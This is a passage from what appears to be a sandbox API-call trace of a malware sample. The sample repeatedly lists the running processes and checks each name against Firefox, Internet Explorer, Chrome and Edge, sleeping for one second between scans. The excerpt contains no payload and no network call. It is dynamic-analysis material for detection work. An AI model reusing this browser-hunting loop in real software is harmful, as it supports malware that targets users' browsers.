(lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0204.662] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0204.662] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.662] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0204.663] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0204.663] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0204.663] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0204.663] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.663] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0204.663] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0204.663] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0204.663] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0204.663] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.663] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0204.664] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0204.664] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0204.664] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0204.664] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.664] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0204.664] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0204.664] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0204.664] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0204.665] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.665] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0204.665] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0204.665] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0204.665] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0204.665] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.665] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0204.666] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0204.666] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0204.666] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0204.666] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.666] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0204.666] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0204.666] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0204.666] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0204.666] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.666] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0204.667] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0204.667] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0204.667] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0204.667] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.667] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0204.667] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0204.667] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0204.667] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0204.667] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.667] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0204.668] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0204.668] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0204.668] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0204.668] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.668] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0204.668] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0204.669] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0204.669] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0204.669] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.669] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0204.669] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0204.669] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0204.669] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0204.669] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.669] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0204.670] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0204.670] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0204.670] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0204.670] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.670] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0204.670] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0204.670] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0204.670] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0204.670] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.670] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0204.671] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0204.671] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0204.671] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0204.671] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.671] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0204.672] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0204.672] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0204.672] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0204.672] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.672] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0204.672] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0204.672] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0204.672] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0204.672] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.672] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0204.673] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0204.673] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0204.673] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0204.673] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.673] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0204.674] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0204.674] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0204.674] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0204.674] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.674] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.674] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0204.674] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0204.674] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0204.674] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.674] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.675] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.675] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.675] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.675] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.675] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0204.675] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0204.675] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0204.675] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0204.675] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.675] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.676] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.676] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.676] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.676] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.676] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0204.676] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0204.677] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0204.677] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0204.677] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.677] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.677] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.677] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.677] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.677] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.677] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.678] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0204.678] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0204.678] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0204.678] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.678] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0204.678] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0204.678] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0204.678] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0204.678] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.678] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.679] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0204.679] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0204.679] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0204.679] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.679] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.679] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0204.679] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0204.679] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0204.679] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.680] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.680] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0204.680] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0204.680] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0204.680] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.680] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.728] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0204.728] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0204.728] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0204.728] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.728] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.728] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0204.728] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0204.728] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0204.728] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.728] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0204.729] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0204.729] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0204.729] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0204.729] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0204.729] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0204.730] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0204.730] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0204.730] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0204.730] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.730] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0204.730] CloseHandle (hObject=0xd4) returned 1 [0204.730] Sleep (dwMilliseconds=0x3e8) [0205.773] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0205.775] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.775] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0205.776] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0205.776] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0205.776] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0205.776] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0205.776] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0205.776] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0205.776] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0205.776] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0205.776] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0205.777] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0205.777] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0205.777] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0205.777] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.777] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.777] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0205.777] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0205.777] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0205.777] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.777] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0205.778] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0205.778] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0205.778] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0205.778] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.778] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.778] lstrcmpiA 